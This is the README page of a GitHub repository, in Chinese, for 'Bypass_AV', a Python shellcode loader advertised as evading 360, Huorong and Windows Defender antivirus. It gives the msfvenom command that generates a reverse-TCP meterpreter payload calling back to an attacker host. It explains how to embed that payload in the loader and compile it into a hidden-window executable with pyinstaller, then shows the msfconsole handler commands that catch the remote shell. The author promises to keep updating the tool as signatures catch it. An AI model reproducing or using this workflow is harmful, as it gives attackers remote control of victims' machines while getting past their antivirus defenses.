Skip to content
/ Bypass_AV Public

Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender

Notifications You must be signed in to change notification settings

Axx8/Bypass_AV

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 

Repository files navigation

Bypass_AV

Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender

代码够简单,估计要不了多久就进特征库了,被杀了再去改几个特征码照样又可以免杀,保持更新。

声明

该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!

代码未经过大量测试,如发现问题请提交 issue。

环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows Defender

Windows 10 64位 360&火绒&Windows Defender

Windows 7 64位 或以上操作系统应该都没问题(没有测试)

使用msfvenom

生成ShellCode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c

注意:ShellCode 需要是64位的

image-20220508135022087

加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处

注意:保留原始ShellCode 里的双引号 "

示例:

image-20220508134821387

最终格式:

image-20220508135655093

打包成可执行程序

编译

Python 3.8.6

pyinstaller 4.7

pip install pyinstaller 
pyinstaller -F -w Bypss_AV.py

生成Bypass_AV.exe在dist目录中

运行监听

msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run

Bypass_360

360.mov

Bypass_火绒

default.mov

Bypass_Windows Defender

Defender.mov

感谢阅读

Axx8 微信公众号

About

Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages